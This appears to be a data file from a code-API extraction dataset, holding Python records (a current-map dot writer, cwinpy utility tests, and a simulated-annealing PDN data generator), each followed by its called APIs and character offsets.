getDots2=np.empty(shape=[len(label2),3], dtype='float64')
getrgb2=np.empty(shape=[len(label2),3], dtype='float64')
getDots3=np.empty(shape=[len(label3),3], dtype='float64')
getrgb3=np.empty(shape=[len(label3),3], dtype='float64')
getDots4=np.empty(shape=[len(label4),3], dtype='float64')
getrgb4=np.empty(shape=[len(label4),3], dtype='float64')
compt=0
while(compt < len(label1)):
getDots1[compt]= label1[compt][0]
getrgb1[compt]= label1[compt][1]
if(verbose==1):
dotslabel1.write('%8s'%getDots1[compt,0]+'%8s'%getDots1[compt,1]+'%8s'%getDots1[compt,2]+espace5+'%5s'%getrgb1[compt,0]+'%5s'%getrgb1[compt,1]+'%5s'%getrgb1[compt,2]+'\n')
compt=compt+1
compt=0
while(compt < len(getDots2)):
getDots2[compt]= label2[compt][0]
getrgb2[compt]= label2[compt][1]
if(verbose==1):
dotslabel2.write('%8s'%getDots2[compt,0]+'%8s'%getDots2[compt,1]+'%8s'%getDots2[compt,2]+espace5+'%5s'%getrgb2[compt,0]+'%5s'%getrgb2[compt,1]+'%5s'%getrgb2[compt,2]+'\n')
compt=compt+1
compt=0
while(compt < len(getDots3)):
getDots3[compt]= label3[compt][0]
getrgb3[compt]= label3[compt][1]
if(verbose==1):
dotslabel3.write('%8s'%getDots3[compt,0]+'%8s'%getDots3[compt,1]+'%8s'%getDots3[compt,2]+espace5+'%5s'%getrgb3[compt,0]+'%5s'%getrgb3[compt,1]+'%5s'%getrgb3[compt,2]+'\n')
compt=compt+1
compt=0
while(compt < len(getDots4)):
getDots4[compt]= label4[compt][0]
getrgb4[compt]= label4[compt][1]
if(verbose==1):
dotslabel4.write('%8s'%getDots4[compt,0]+'%8s'%getDots4[compt,1]+'%8s'%getDots4[compt,2]+espace5+'%5s'%getrgb4[compt,0]+'%5s'%getrgb4[compt,1]+'%5s'%getrgb4[compt,2]+'\n')
compt=compt+1
if(verbose==1):
dotslabel1.close()
dotslabel2.close()
dotslabel3.close()
dotslabel4.close()
else:
os.remove("psa.in")
os.remove("psa.out")
return getDots, getrgb, getDots1, getrgb1, getDots2, getrgb2, getDots3, getrgb3, getDots4, getrgb4
|
[
"math.sqrt",
"numpy.array",
"numpy.empty",
"numpy.vstack",
"os.system",
"os.remove"
] |
[((776, 847), 'numpy.array', 'np.array', (['[[0, 0, 0], [0.9, 0.9, 0.9], [1, 0, 0], [0, 1, 0], [0, 0, 1]]'], {}), '([[0, 0, 0], [0.9, 0.9, 0.9], [1, 0, 0], [0, 1, 0], [0, 0, 1]])\n', (784, 847), True, 'import numpy as np\n'), ((3459, 3473), 'os.system', 'os.system', (['cmd'], {}), '(cmd)\n', (3468, 3473), False, 'import os\n'), ((3878, 3922), 'numpy.empty', 'np.empty', ([], {'shape': '[nbDots, 3]', 'dtype': '"""float64"""'}), "(shape=[nbDots, 3], dtype='float64')\n", (3886, 3922), True, 'import numpy as np\n'), ((3933, 3977), 'numpy.empty', 'np.empty', ([], {'shape': '[nbDots, 3]', 'dtype': '"""float64"""'}), "(shape=[nbDots, 3], dtype='float64')\n", (3941, 3977), True, 'import numpy as np\n'), ((7968, 7987), 'os.remove', 'os.remove', (['"""psa.in"""'], {}), "('psa.in')\n", (7977, 7987), False, 'import os\n'), ((7996, 8016), 'os.remove', 'os.remove', (['"""psa.out"""'], {}), "('psa.out')\n", (8005, 8016), False, 'import os\n'), ((4515, 4580), 'math.sqrt', 'math.sqrt', (['((xDot - xa) ** 2 + (yDot - ya) ** 2 + (zDot - za) ** 2)'], {}), '((xDot - xa) ** 2 + (yDot - ya) ** 2 + (zDot - za) ** 2)\n', (4524, 4580), False, 'import math\n'), ((4994, 5044), 'numpy.vstack', 'np.vstack', (['[getDots[comptDots], getrgb[comptDots]]'], {}), '([getDots[comptDots], getrgb[comptDots]])\n', (5003, 5044), True, 'import numpy as np\n'), ((2791, 2911), 'math.sqrt', 'math.sqrt', (['((getx[compt] - getx[compt2]) ** 2 + (gety[compt] - gety[compt2]) ** 2 + (\n getz[compt] - getz[compt2]) ** 2)'], {}), '((getx[compt] - getx[compt2]) ** 2 + (gety[compt] - gety[compt2]) **\n 2 + (getz[compt] - getz[compt2]) ** 2)\n', (2800, 2911), False, 'import math\n'), ((5098, 5148), 'numpy.vstack', 'np.vstack', (['[getDots[comptDots], getrgb[comptDots]]'], {}), '([getDots[comptDots], getrgb[comptDots]])\n', (5107, 5148), True, 'import numpy as np\n'), ((5202, 5252), 'numpy.vstack', 'np.vstack', (['[getDots[comptDots], getrgb[comptDots]]'], {}), '([getDots[comptDots], getrgb[comptDots]])\n', (5211, 5252), True, 'import numpy as np\n'), ((5306, 5356), 'numpy.vstack', 'np.vstack', (['[getDots[comptDots], getrgb[comptDots]]'], {}), '([getDots[comptDots], getrgb[comptDots]])\n', (5315, 5356), True, 'import numpy as np\n')]
|
"""
Test script for utils.py function.
"""
import os
import numpy as np
import pytest
from astropy import units as u
from cwinpy.utils import (
ellipticity_to_q22,
gcd_array,
get_psr_name,
initialise_ephemeris,
int_to_alpha,
is_par_file,
logfactorial,
q22_to_ellipticity,
)
from lalpulsar.PulsarParametersWrapper import PulsarParametersPy
def test_logfactorial():
"""
Test log factorial function
"""
a = 3
assert logfactorial(a) == np.log(3 * 2 * 1)
a = 3.0
assert logfactorial(a) == np.log(3 * 2 * 1)
def test_gcd_array():
"""
Test greatest common divisor function.
"""
a = 1 # non-list value
with pytest.raises(TypeError):
gcd_array(a)
a = [1] # single value
with pytest.raises(ValueError):
gcd_array(a)
a = [5, 25, 90]
assert gcd_array(a) == 5
def test_int_to_alpha():
"""
Test integer to alphabetical string conversion.
"""
pos = 2.3
with pytest.raises(TypeError):
int_to_alpha(pos)
pos = -1
with pytest.raises(ValueError):
int_to_alpha(pos)
assert int_to_alpha(1) == "A"
assert int_to_alpha(1, case="lower") == "a"
assert int_to_alpha(26) == "Z"
assert int_to_alpha(26, case="lower") == "z"
assert int_to_alpha(27) == "AA"
assert int_to_alpha(28) == "AB"
assert int_to_alpha(200) == "GR"
assert int_to_alpha(1000) == "ALL"
def test_is_par_file():
"""
Test failure of is_par_file.
"""
assert is_par_file("blah_blah_blah") is False
# test par files that don't contain required attributes
brokenpar = "broken.par"
values = {
"F": [100.0],
"RAJ": 0.1,
"DECJ": -0.1,
"PSRJ": "J0101-0101",
}
for leavekey in list(values.keys()):
keys = list(values.keys())
psr = PulsarParametersPy()
for key in keys:
if key != leavekey:
psr[key] = values[key]
psr.pp_to_par(brokenpar)
assert is_par_file(brokenpar) is False
os.remove(brokenpar)
def test_get_psr_name():
"""
Test extraction of pulsar name.
"""
for item, name in zip(
["PSRJ", "PSRB", "PSR", "NAME"],
["J0123+1234", "B0124+12", "J0123+1234", "B0124+12"],
):
psr = PulsarParametersPy()
psr[item] = name
assert get_psr_name(psr) == name
def test_ellipticity_to_q22():
"""
Test ellipticity conversion to mass quadrupole.
"""
epsilon = [1e-9, 1e-8]
expected_q22 = np.array([1e29, 1e30]) * np.sqrt(15.0 / (8.0 * np.pi))
q22 = ellipticity_to_q22(epsilon[0])
assert np.isclose(q22, expected_q22[0])
# test units
q22units = ellipticity_to_q22(epsilon[0], units=True)
assert np.isclose(q22units.value, expected_q22[0])
assert q22units.unit == u.Unit("kg m2")
# test array like
q22 = ellipticity_to_q22(epsilon)
assert len(q22) == len(epsilon)
assert np.allclose(q22, expected_q22)
def test_q22_to_ellipticity_to_q22():
"""
Test mass quadrupole conversion to ellipticity.
"""
q22 = [1e29, 1e30]
expected_epsilon = np.array([1e-9, 1e-8]) / np.sqrt(15.0 / (8.0 * np.pi))
epsilon = q22_to_ellipticity(q22[0])
assert np.isclose(epsilon, expected_epsilon[0])
# test array like
epsilon = q22_to_ellipticity(q22)
assert len(q22) == len(epsilon)
assert np.allclose(epsilon, expected_epsilon)
# test no unit
epsilon = q22_to_ellipticity(q22[0] * u.kg * u.m ** 2)
assert np.isclose(epsilon, expected_epsilon[0])
assert not hasattr(epsilon, "unit")
def test_initialise_ephemeris():
"""
Test reading of ephemeris files.
"""
with pytest.raises(ValueError):
initialise_ephemeris(units="lhfld")
with pytest.raises(IOError):
initialise_ephemeris(
earthfile="jksgdksg", sunfile="lhlbca", timefile="lshdldgls"
)
with pytest.raises(IOError):
initialise_ephemeris(
earthfile="jksgdksg", sunfile="lhlbca", timefile="lshdldgls"
)
with pytest.raises(IOError):
initialise_ephemeris(timefile="lshdldgls")
edat, tdat = initialise_ephemeris()
assert edat.nentriesE == 175322
assert edat.nentriesS == 17534
assert edat.dtEtable == 7200.0
assert edat.dtStable == 72000.0
assert edat.etype == 2
assert tdat.nentriesT == 87660
assert tdat.dtTtable == 14400.0
|
[
"cwinpy.utils.int_to_alpha",
"numpy.allclose",
"numpy.isclose",
"numpy.sqrt",
"astropy.units.Unit",
"numpy.log",
"cwinpy.utils.q22_to_ellipticity",
"os.remove",
"numpy.array",
"cwinpy.utils.is_par_file",
"cwinpy.utils.ellipticity_to_q22",
"pytest.raises",
"lalpulsar.PulsarParametersWrapper.PulsarParametersPy",
"cwinpy.utils.gcd_array",
"cwinpy.utils.initialise_ephemeris",
"cwinpy.utils.get_psr_name",
"cwinpy.utils.logfactorial"
] |
[((2618, 2648), 'cwinpy.utils.ellipticity_to_q22', 'ellipticity_to_q22', (['epsilon[0]'], {}), '(epsilon[0])\n', (2636, 2648), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((2661, 2693), 'numpy.isclose', 'np.isclose', (['q22', 'expected_q22[0]'], {}), '(q22, expected_q22[0])\n', (2671, 2693), True, 'import numpy as np\n'), ((2727, 2769), 'cwinpy.utils.ellipticity_to_q22', 'ellipticity_to_q22', (['epsilon[0]'], {'units': '(True)'}), '(epsilon[0], units=True)\n', (2745, 2769), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((2782, 2825), 'numpy.isclose', 'np.isclose', (['q22units.value', 'expected_q22[0]'], {}), '(q22units.value, expected_q22[0])\n', (2792, 2825), True, 'import numpy as np\n'), ((2903, 2930), 'cwinpy.utils.ellipticity_to_q22', 'ellipticity_to_q22', (['epsilon'], {}), '(epsilon)\n', (2921, 2930), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((2979, 3009), 'numpy.allclose', 'np.allclose', (['q22', 'expected_q22'], {}), '(q22, expected_q22)\n', (2990, 3009), True, 'import numpy as np\n'), ((3234, 3260), 'cwinpy.utils.q22_to_ellipticity', 'q22_to_ellipticity', (['q22[0]'], {}), '(q22[0])\n', (3252, 3260), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((3273, 3313), 'numpy.isclose', 'np.isclose', (['epsilon', 'expected_epsilon[0]'], {}), '(epsilon, expected_epsilon[0])\n', (3283, 3313), True, 'import numpy as np\n'), ((3351, 3374), 'cwinpy.utils.q22_to_ellipticity', 'q22_to_ellipticity', (['q22'], {}), '(q22)\n', (3369, 3374), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((3423, 3461), 'numpy.allclose', 'np.allclose', (['epsilon', 'expected_epsilon'], {}), '(epsilon, expected_epsilon)\n', (3434, 3461), True, 'import numpy as np\n'), ((3496, 3540), 'cwinpy.utils.q22_to_ellipticity', 'q22_to_ellipticity', (['(q22[0] * u.kg * u.m ** 2)'], {}), '(q22[0] * u.kg * u.m ** 2)\n', (3514, 3540), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((3553, 3593), 'numpy.isclose', 'np.isclose', (['epsilon', 'expected_epsilon[0]'], {}), '(epsilon, expected_epsilon[0])\n', (3563, 3593), True, 'import numpy as np\n'), ((4200, 4222), 'cwinpy.utils.initialise_ephemeris', 'initialise_ephemeris', ([], {}), '()\n', (4220, 4222), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((470, 485), 'cwinpy.utils.logfactorial', 'logfactorial', (['a'], {}), '(a)\n', (482, 485), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((489, 506), 'numpy.log', 'np.log', (['(3 * 2 * 1)'], {}), '(3 * 2 * 1)\n', (495, 506), True, 'import numpy as np\n'), ((531, 546), 'cwinpy.utils.logfactorial', 'logfactorial', (['a'], {}), '(a)\n', (543, 546), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((550, 567), 'numpy.log', 'np.log', (['(3 * 2 * 1)'], {}), '(3 * 2 * 1)\n', (556, 567), True, 'import numpy as np\n'), ((689, 713), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (702, 713), False, 'import pytest\n'), ((723, 735), 'cwinpy.utils.gcd_array', 'gcd_array', (['a'], {}), '(a)\n', (732, 735), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((774, 799), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (787, 799), False, 'import pytest\n'), ((809, 821), 'cwinpy.utils.gcd_array', 'gcd_array', (['a'], {}), '(a)\n', (818, 821), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((854, 866), 'cwinpy.utils.gcd_array', 'gcd_array', (['a'], {}), '(a)\n', (863, 866), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((991, 1015), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (1004, 1015), False, 'import pytest\n'), ((1025, 1042), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['pos'], {}), '(pos)\n', (1037, 1042), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1066, 1091), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (1079, 1091), False, 'import pytest\n'), ((1101, 1118), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['pos'], {}), '(pos)\n', (1113, 1118), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1131, 1146), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(1)'], {}), '(1)\n', (1143, 1146), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1165, 1194), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(1)'], {'case': '"""lower"""'}), "(1, case='lower')\n", (1177, 1194), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1213, 1229), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(26)'], {}), '(26)\n', (1225, 1229), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1248, 1278), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(26)'], {'case': '"""lower"""'}), "(26, case='lower')\n", (1260, 1278), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1297, 1313), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(27)'], {}), '(27)\n', (1309, 1313), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1333, 1349), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(28)'], {}), '(28)\n', (1345, 1349), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1369, 1386), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(200)'], {}), '(200)\n', (1381, 1386), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1406, 1424), 'cwinpy.utils.int_to_alpha', 'int_to_alpha', (['(1000)'], {}), '(1000)\n', (1418, 1424), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1521, 1550), 'cwinpy.utils.is_par_file', 'is_par_file', (['"""blah_blah_blah"""'], {}), "('blah_blah_blah')\n", (1532, 1550), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((1857, 1877), 'lalpulsar.PulsarParametersWrapper.PulsarParametersPy', 'PulsarParametersPy', ([], {}), '()\n', (1875, 1877), False, 'from lalpulsar.PulsarParametersWrapper import PulsarParametersPy\n'), ((2065, 2085), 'os.remove', 'os.remove', (['brokenpar'], {}), '(brokenpar)\n', (2074, 2085), False, 'import os\n'), ((2317, 2337), 'lalpulsar.PulsarParametersWrapper.PulsarParametersPy', 'PulsarParametersPy', ([], {}), '()\n', (2335, 2337), False, 'from lalpulsar.PulsarParametersWrapper import PulsarParametersPy\n'), ((2553, 2577), 'numpy.array', 'np.array', (['[1e+29, 1e+30]'], {}), '([1e+29, 1e+30])\n', (2561, 2577), True, 'import numpy as np\n'), ((2578, 2607), 'numpy.sqrt', 'np.sqrt', (['(15.0 / (8.0 * np.pi))'], {}), '(15.0 / (8.0 * np.pi))\n', (2585, 2607), True, 'import numpy as np\n'), ((2854, 2869), 'astropy.units.Unit', 'u.Unit', (['"""kg m2"""'], {}), "('kg m2')\n", (2860, 2869), True, 'from astropy import units as u\n'), ((3165, 3189), 'numpy.array', 'np.array', (['[1e-09, 1e-08]'], {}), '([1e-09, 1e-08])\n', (3173, 3189), True, 'import numpy as np\n'), ((3190, 3219), 'numpy.sqrt', 'np.sqrt', (['(15.0 / (8.0 * np.pi))'], {}), '(15.0 / (8.0 * np.pi))\n', (3197, 3219), True, 'import numpy as np\n'), ((3732, 3757), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (3745, 3757), False, 'import pytest\n'), ((3767, 3802), 'cwinpy.utils.initialise_ephemeris', 'initialise_ephemeris', ([], {'units': '"""lhfld"""'}), "(units='lhfld')\n", (3787, 3802), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((3813, 3835), 'pytest.raises', 'pytest.raises', (['IOError'], {}), '(IOError)\n', (3826, 3835), False, 'import pytest\n'), ((3845, 3932), 'cwinpy.utils.initialise_ephemeris', 'initialise_ephemeris', ([], {'earthfile': '"""jksgdksg"""', 'sunfile': '"""lhlbca"""', 'timefile': '"""lshdldgls"""'}), "(earthfile='jksgdksg', sunfile='lhlbca', timefile=\n 'lshdldgls')\n", (3865, 3932), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((3960, 3982), 'pytest.raises', 'pytest.raises', (['IOError'], {}), '(IOError)\n', (3973, 3982), False, 'import pytest\n'), ((3992, 4079), 'cwinpy.utils.initialise_ephemeris', 'initialise_ephemeris', ([], {'earthfile': '"""jksgdksg"""', 'sunfile': '"""lhlbca"""', 'timefile': '"""lshdldgls"""'}), "(earthfile='jksgdksg', sunfile='lhlbca', timefile=\n 'lshdldgls')\n", (4012, 4079), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((4107, 4129), 'pytest.raises', 'pytest.raises', (['IOError'], {}), '(IOError)\n', (4120, 4129), False, 'import pytest\n'), ((4139, 4181), 'cwinpy.utils.initialise_ephemeris', 'initialise_ephemeris', ([], {'timefile': '"""lshdldgls"""'}), "(timefile='lshdldgls')\n", (4159, 4181), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((2024, 2046), 'cwinpy.utils.is_par_file', 'is_par_file', (['brokenpar'], {}), '(brokenpar)\n', (2035, 2046), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n'), ((2379, 2396), 'cwinpy.utils.get_psr_name', 'get_psr_name', (['psr'], {}), '(psr)\n', (2391, 2396), False, 'from cwinpy.utils import ellipticity_to_q22, gcd_array, get_psr_name, initialise_ephemeris, int_to_alpha, is_par_file, logfactorial, q22_to_ellipticity\n')]
|
#BSD 3-Clause License
#
#Copyright (c) 2019, The Regents of the University of Minnesota
#
#All rights reserved.
#
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions are met:
#
#* Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
#* Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
#* Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
#AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
#IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
#FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
#DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
#CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
#OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 21 21:16:37 2019
This is the main code that runs simulated annleaing to generate the data
@author: <NAME>
"""
import sys
import numpy as np
from create_template import define_templates
from T6_PSI_settings import T6_PSI_settings
from simulated_annealer import simulated_annealer
import random
from tqdm import tqdm
#from eliminate_templates import load_template_list
def main():
# Read the json user input file and the current maps that need to be run
# taken as an argument from the scripts
settings_obj = T6_PSI_settings.load_obj()
if len(sys.argv) == 3:
map_start = int(sys.argv[1])
num_maps = int(sys.argv[2])
congestion_enabled = 1
elif len(sys.argv) == 4:
map_start = int(sys.argv[1])
num_maps = int(sys.argv[2])
if sys.argv[3] == "no_congestion":
congestion_enabled = 0
else:
congestion_enabled = 1
else:
map_start = 1
num_maps = 15
congestion_enabled = 1
print("Warning defaulting to %d %d and with congestion" % (map_start, num_maps))
print(sys.argv)
#print(num_maps)
# Initialize the SA parameters
T_init = 70
T_final = 0.0005
alpha_temp = 0.95
num_moves_per_step = 5
state = [] #np.zeros((num_maps, settings_obj.NUM_REGIONS))
e = []#np.zeros(num_maps)
max_drop = [] #np.zeros((num_maps, settings_obj.NUM_REGIONS))
template_list = define_templates(settings_obj, generate_g=0)
congestion = []
all_templates = settings_obj.load_template_list()#range(settings_obj.NUM_TEMPLATES))
size_region_x = int(settings_obj.WIDTH_REGION * 1e6)
size_region_y = int(settings_obj.LENGTH_REGION * 1e6)
current_maps = []
for i in tqdm(range(num_maps)):
# print(i)
power_map_file = settings_obj.map_dir + "current_map_%d.csv" % (
i + map_start)
currents = np.genfromtxt(power_map_file, delimiter=',')
for y in range(settings_obj.current_map_num_regions):
for x in range(settings_obj.current_map_num_regions):
print("%d %d "%(x,y))
#region and neighbors
current_region = np.zeros((3*size_region_x,3*size_region_y))
init_state = np.zeros(9, int)
if congestion_enabled == 1 :
signal_cong = [0.3 + 0.7*random.uniform(0, 1) for _ in range(9) ]
else:
signal_cong = [0 for _ in range(9) ]
if x == 0:
x_start = 0
x_end = x_start+2*size_region_x
if y == 0:
y_start = 0
y_end = y_start+2*size_region_y
current_region[size_region_x:,size_region_y:] = (
currents[x_start:x_end,y_start:y_end])
elif y == settings_obj.current_map_num_regions-1:
y_start = (y-1)*size_region_y
y_end = y_start+2*size_region_y
current_region[size_region_x:,0:2*size_region_y] = (
currents[x_start:x_end,y_start:y_end])
else:
y_start = (y-1)*size_region_y
y_end = y_start+3*size_region_y
current_region[size_region_x:,:] = (
currents[x_start:x_end,y_start:y_end])
elif x == settings_obj.current_map_num_regions-1:
x_start = (x-1)*size_region_x
x_end = x_start+2*size_region_x
if y == 0:
y_start = 0
y_end = y_start+2*size_region_y
current_region[0:2*size_region_x,size_region_y:] = (
currents[x_start:x_end,y_start:y_end])
elif y == settings_obj.current_map_num_regions-1:
y_start = (y-1)*size_region_y
y_end = y_start+2*size_region_y
current_region[0:2*size_region_x,0:2*size_region_y] = (
currents[x_start:x_end,y_start:y_end])
else:
y_start = (y-1)*size_region_y
y_end = y_start+3*size_region_y
current_region[0:2*size_region_x,:] = (
currents[x_start:x_end,y_start:y_end])
else:
x_start = (x-1)*size_region_x
x_end = x_start+3*size_region_x
if y == 0:
y_start = 0
y_end = y_start+2*size_region_y
current_region[:,size_region_y:] = (
currents[x_start:x_end,y_start:y_end])
elif y == settings_obj.current_map_num_regions-1:
y_start = (y-1)*size_region_y
y_end = y_start+2*size_region_y
current_region[:,0:2*size_region_y] = (
currents[x_start:x_end,y_start:y_end])
else:
y_start = (y-1)*size_region_y
y_end = y_start+3*size_region_y
current_region[:,:] = (
currents[x_start:x_end,y_start:y_end])
pdn_opt = simulated_annealer(init_state, T_init, T_final,
alpha_temp, num_moves_per_step,
current_region,congestion_enabled)
n_state, n_e, n_max_drop = pdn_opt.sim_anneal(
all_templates, template_list,signal_cong)
state.append(n_state)
max_drop.append(n_max_drop)
congestion.append(signal_cong)
current_maps.append(current_region.reshape(-1))
e.append(n_e)
#print(n_state,n_max_drop,signal_cong,n_e)
with open(
settings_obj.parallel_run_dir + 'max_drop_%d_to_%d.csv' %
(map_start, map_start + num_maps - 1), 'w') as outfile:
np.savetxt(outfile, max_drop, delimiter=',', fmt='%f')
with open(
settings_obj.parallel_run_dir + 'state_%d_to_%d.csv' %
(map_start, map_start + num_maps - 1), 'w') as outfile:
np.savetxt(outfile, state, delimiter=',', fmt='%d')
with open(
settings_obj.parallel_run_dir + 'energy_%d_to_%d.csv' %
(map_start, map_start + num_maps - 1), 'w') as outfile:
np.savetxt(outfile, e, delimiter=',', fmt='%f')
if congestion_enabled ==1:
with open(
settings_obj.parallel_run_dir + 'congest_%d_to_%d.csv' %
(map_start, map_start + num_maps - 1), 'w') as outfile:
np.savetxt(outfile,congestion, delimiter=',', fmt='%f')
with open(
settings_obj.parallel_run_dir + 'current_maps_%d_to_%d.csv' %
(map_start, map_start + num_maps - 1), 'w') as outfile:
np.savetxt(outfile,current_maps, delimiter=',', fmt='%f')
if __name__ == '__main__':
main()
|
[
"create_template.define_templates",
"random.uniform",
"simulated_annealer.simulated_annealer",
"numpy.zeros",
"numpy.savetxt",
"T6_PSI_settings.T6_PSI_settings.load_obj",
"numpy.genfromtxt"
] |
[((2165, 2191), 'T6_PSI_settings.T6_PSI_settings.load_obj', 'T6_PSI_settings.load_obj', ([], {}), '()\n', (2189, 2191), False, 'from T6_PSI_settings import T6_PSI_settings\n'), ((3075, 3119), 'create_template.define_templates', 'define_templates', (['settings_obj'], {'generate_g': '(0)'}), '(settings_obj, generate_g=0)\n', (3091, 3119), False, 'from create_template import define_templates\n'), ((3539, 3583), 'numpy.genfromtxt', 'np.genfromtxt', (['power_map_file'], {'delimiter': '""","""'}), "(power_map_file, delimiter=',')\n", (3552, 3583), True, 'import numpy as np\n'), ((7825, 7879), 'numpy.savetxt', 'np.savetxt', (['outfile', 'max_drop'], {'delimiter': '""","""', 'fmt': '"""%f"""'}), "(outfile, max_drop, delimiter=',', fmt='%f')\n", (7835, 7879), True, 'import numpy as np\n'), ((8034, 8085), 'numpy.savetxt', 'np.savetxt', (['outfile', 'state'], {'delimiter': '""","""', 'fmt': '"""%d"""'}), "(outfile, state, 